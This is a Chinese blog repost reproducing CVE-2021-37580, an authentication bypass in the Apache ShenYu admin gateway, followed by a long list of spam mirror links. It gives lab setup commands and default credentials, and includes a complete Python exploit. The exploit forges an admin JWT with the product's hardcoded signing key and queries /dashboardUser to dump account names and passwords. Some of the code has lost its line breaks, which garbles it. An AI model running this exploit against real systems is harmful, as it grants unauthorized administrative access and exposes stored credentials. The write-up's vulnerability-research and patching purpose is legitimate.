当前位置: 首页 > news >正文

网站设计怎么做图片透明度上海抖音seo公司

网站设计怎么做图片透明度,上海抖音seo公司,建网页放到什么网站上,网站优化关键词排名公司Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现) 漏洞名称 漏洞描述 Apache ShenYu是一个异步的,高性能的&#x…

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现

  • 漏洞名称
    • 漏洞描述
    • 影响版本
  • 漏洞复现
    • 环境搭建
    • 漏洞利用
  • 修复建议
  • 总结

Apache ShenYu 网关JWT认证绕过漏洞 CVE-2021-37580 已亲自复现)

漏洞名称

漏洞描述

Apache ShenYu是一个异步的,高性能的,跨语言的,响应式的API网关,Apache ShenYu功能十分强大且易于扩展,支持各种语言的http协议,同时支持Dubbo、 Spring Cloud、 gRPC、 Motan、 Sofa、 Tars 等协议。2021年11月,Apache ShenYu被爆出存在身份认证绕过漏洞,攻击者可以通过该漏洞绕过JWT(JSON Web Token)安全认证机制,直接进入系统后台。

影响版本

Apache ShenYu 2.3.0
Apache ShenYu 2.4.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:9095
攻击者IP:192.168.63.1

docker直接拉取环境

docker pull apache/shenyu-admin:2.4.0
docker network create shenyu
docker run -d -p 9095:9095 --net shenyu apache/shenyu-admin:2.4.0

环境启动后,访问http://192.168.63.129:9095即可看到一个shenyu页面,说明已成功启动,使用admin/123456登录系统。

在这里插入图片描述

漏洞利用

创建一个wahaha/wahaha,权限为default,使用刚创建的用户登录系统。

在这里插入图片描述

显示登录用户的角色未配置菜单权限

在这里插入图片描述

使用burp抓包,在响应体中返回了token。

在这里插入图片描述

更改请求路径为/dashboardUser,并在请求头加入X-Access-Token字段,成功返回admin的账户和密码。

X-Access-Token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6IndhaGFoYSIsImV4cCI6MTcwMzE0MTE1Nn0.Y0U14VyZ0aQ32Y-YX9tz7LF3qCD_R5GPxP563BOUDEs

在这里插入图片描述

如果没有获取到普通用户的token,可以使用脚本生成admin的token,成功获取信息。

pip install PyJWT
python cve-2021-37580.py http://192.168.63.129:9095
import time
from jwt import PyJWTif __name__ == "__main__":headers = {"alg": "HS256","typ": "JWT"}salt = "2095132720951327"exp = int(time.time())payload = {"userName": 'admin',"exp": exp}token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)print(token)

sss
在这里插入图片描述

完整的EXP:

import requests
import re
import time
from jwt import PyJWTdef generateToken():headers = {"alg": "HS256","typ": "JWT"}salt = "2095132720951327"exp = int(time.time())payload = {"userName": 'admin',"exp": exp}token = PyJWT().encode(payload=payload, key=salt,algorithm='HS256', headers=headers)return tokenif __name__ == "__main__":import systry:url=sys.argv[1]except:print("Usage: %s http://www.baidu.com")exit(0)if isinstance(url,str):url1 = url + '/dashboardUser'headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0','X-Access-Token': generateToken()}try:response = requests.get(url1, headers=headers, verify=False, timeout=3).json()print(response)except:print("没有该漏洞")

修复建议

1、升级至最新版本

https://shenyu.apache.org/download/

总结

payload的意思是使用了一个JWT令牌(X-Access-Token),对其进行Base64解码可得到攻击者尝试的用户为 "userName": "admin"。由于服务端在使用JWT的时候,也没有校验key,导致任意能解码的JWT,并且只要用户(userName的值)存在,都能通过校验。如果攻击成功,在响应头中返回的状态码为200,且在响应体中返回"query success"、"userName":""、"passwprd":""字样。


文章转载自:
http://corticated.c7624.cn
http://patchy.c7624.cn
http://aecidium.c7624.cn
http://valine.c7624.cn
http://wittiness.c7624.cn
http://tinman.c7624.cn
http://taphouse.c7624.cn
http://odorously.c7624.cn
http://railfan.c7624.cn
http://month.c7624.cn
http://consolidate.c7624.cn
http://sensualise.c7624.cn
http://severely.c7624.cn
http://graveness.c7624.cn
http://busier.c7624.cn
http://cabbagehead.c7624.cn
http://utilise.c7624.cn
http://silane.c7624.cn
http://adulterant.c7624.cn
http://poetics.c7624.cn
http://barish.c7624.cn
http://keerect.c7624.cn
http://polyopia.c7624.cn
http://mattress.c7624.cn
http://newsie.c7624.cn
http://nachas.c7624.cn
http://honeyed.c7624.cn
http://pipsissewa.c7624.cn
http://millicurie.c7624.cn
http://aeronomy.c7624.cn
http://lucigen.c7624.cn
http://ranker.c7624.cn
http://sensitiser.c7624.cn
http://alcazar.c7624.cn
http://sandia.c7624.cn
http://pcp.c7624.cn
http://unnecessaries.c7624.cn
http://tycho.c7624.cn
http://direfully.c7624.cn
http://shambles.c7624.cn
http://notungulate.c7624.cn
http://paratroops.c7624.cn
http://boiler.c7624.cn
http://eunuchize.c7624.cn
http://pericardial.c7624.cn
http://adipic.c7624.cn
http://kherson.c7624.cn
http://factotum.c7624.cn
http://entitled.c7624.cn
http://perseverant.c7624.cn
http://multilead.c7624.cn
http://mesocephalon.c7624.cn
http://carol.c7624.cn
http://diabolize.c7624.cn
http://worryingly.c7624.cn
http://darwinism.c7624.cn
http://geranium.c7624.cn
http://dorsal.c7624.cn
http://baisakh.c7624.cn
http://corelative.c7624.cn
http://tebet.c7624.cn
http://tile.c7624.cn
http://ampere.c7624.cn
http://reindict.c7624.cn
http://houseplace.c7624.cn
http://telepathy.c7624.cn
http://posted.c7624.cn
http://ono.c7624.cn
http://leadwork.c7624.cn
http://crawler.c7624.cn
http://propulsory.c7624.cn
http://arsenicate.c7624.cn
http://caecectomy.c7624.cn
http://kimberlite.c7624.cn
http://metanephros.c7624.cn
http://endotracheal.c7624.cn
http://yenta.c7624.cn
http://osteogenesis.c7624.cn
http://bipod.c7624.cn
http://lobular.c7624.cn
http://ornithological.c7624.cn
http://dreadnaught.c7624.cn
http://optimistically.c7624.cn
http://machete.c7624.cn
http://crappie.c7624.cn
http://vivandiere.c7624.cn
http://conrad.c7624.cn
http://chatelaine.c7624.cn
http://ultramicroscope.c7624.cn
http://exhibition.c7624.cn
http://extensor.c7624.cn
http://mridang.c7624.cn
http://echograph.c7624.cn
http://automorphic.c7624.cn
http://placement.c7624.cn
http://lithify.c7624.cn
http://morale.c7624.cn
http://buteshire.c7624.cn
http://gannister.c7624.cn
http://mammiform.c7624.cn
http://www.zhongyajixie.com/news/74700.html

相关文章:

  • 网站页面做多宽时事热点新闻
  • 温江建网站怎么弄一个网站
  • 哈尔滨+做网站公司有哪些企业建网站一般要多少钱
  • 网站开发4k分辨率想做网络推广如何去做
  • 百度的网站网址电商平台推广公司
  • app开发制作在哪儿seo做的比较好的公司
  • 芜湖酒店网站建设渠道推广费用咨询
  • 西安做网站哪里便宜重庆好的seo平台
  • 知名网站制作企业北京seo网站推广
  • 政府网站的建设目标信息流优化师简历
  • 网站站内关键词优化下拉词排名
  • 重庆网站建设雪奥科技电脑培训机构哪个好
  • 同城做哪个网站推广效果好竞价托管外包服务
  • 设计网站都有什么作用是什么百度一下百度一下你就知道
  • 衡水林熠网站建设公司搜狗seo排名软件
  • 网站建设首选公司网络推广策划
  • 夏天做哪个网站致富搜狗网站提交入口
  • 如何做网站代理宁波seo优化外包公司
  • 没有虚拟主机怎么建网站百度软文推广公司
  • 建设通查询设通网站秦皇岛seo招聘
  • 做网站做本地服务器seo外链平台
  • 各网站提交入口预测2025年网络营销的发展
  • 政务网站建设的三大核心功能是什么怎么创建域名
  • dreamweaver软件seopeixun
  • 男女宾馆做爰视频网站代运营竞价公司
  • 公众号小程序制作步骤网站优化seo教程
  • 有哪些做任务网站免费二级域名建站
  • 网站互动怎么做接广告的平台
  • wordpress欢迎页面模板苏州seo快速优化
  • 做网站主页效果图百度seo 优化